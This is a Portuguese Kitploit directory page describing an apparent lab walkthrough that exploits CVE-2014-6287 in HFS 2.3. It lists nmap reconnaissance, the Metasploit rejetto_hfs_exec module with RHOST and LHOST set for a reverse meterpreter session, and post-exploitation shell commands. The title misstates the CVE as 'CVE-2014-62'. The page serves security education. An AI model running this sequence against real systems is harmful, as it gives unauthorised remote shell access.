Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
HFS_EXPLOIT_PROJECT — Metasploit RCE no HFS 2.3 - CVE-2014-62 | Kitploit
Ferramentas/GitHubGitHub/sage954526/hfs_exploit_project
Frameworks de ExploraçãoAnálise de VulnerabilidadesExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubsage954526/hfs_exploit_project

HFS_EXPLOIT_PROJECT

Metasploit RCE no HFS 2.3 - CVE-2014-62

Ver Repositório
5há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

HFS_EXPLOIT_PROJECT

Metasploit RCE em HFS 2.3 - CVE-2014-62

🔖 Título do Projeto

root@kitploit:~
> Execução Remota de Código via HTTP File Server (HFS 2.3)

⚙ Ferramentas Utilizadas • Kali Linux • Nmap • Metasploit • Alvo: HFS 2.3 no Windows 7

🔐 Detalhes da Vulnerabilidade • Nome: CVE-2014-6287 • Tipo: Execução Remota de Código • Causa: Entrada não validada no scripting do HFS • Impacto: Acesso de shell não autenticado

🔍 Metodologia (Passo a Passo)

🔹 Passo 1: Levantamento de Informações (Nmap)

root@kitploit:~
•    nmap -sV demo.ine.local (ip do alvo) 
•    porta aberta encontrada : 80
•    serviço : rejetto HTTP file server 2.3

Varredura Nmap

Nmap

🔹 Passo 2: Exploração (Metasploit)

root@kitploit:~
• Msfconsole
• Pesquise por HFS ou rejetto
• use exploit/windows/http/rejetto_hfs_exec
• set RHOST 192.168.1.100
• set RPORT 80
• set LHOST 192.168.1.101
• run

Configuração do Exploit

Exploit Exploit

Baixar ferramenta

🔹 Passo 3: Pós-Exploração

após executar, você obterá uma sessão do meterpreter use o comando : shell

• whoami • ipconfig • dir

Acesso ao Shell

Shell

Shell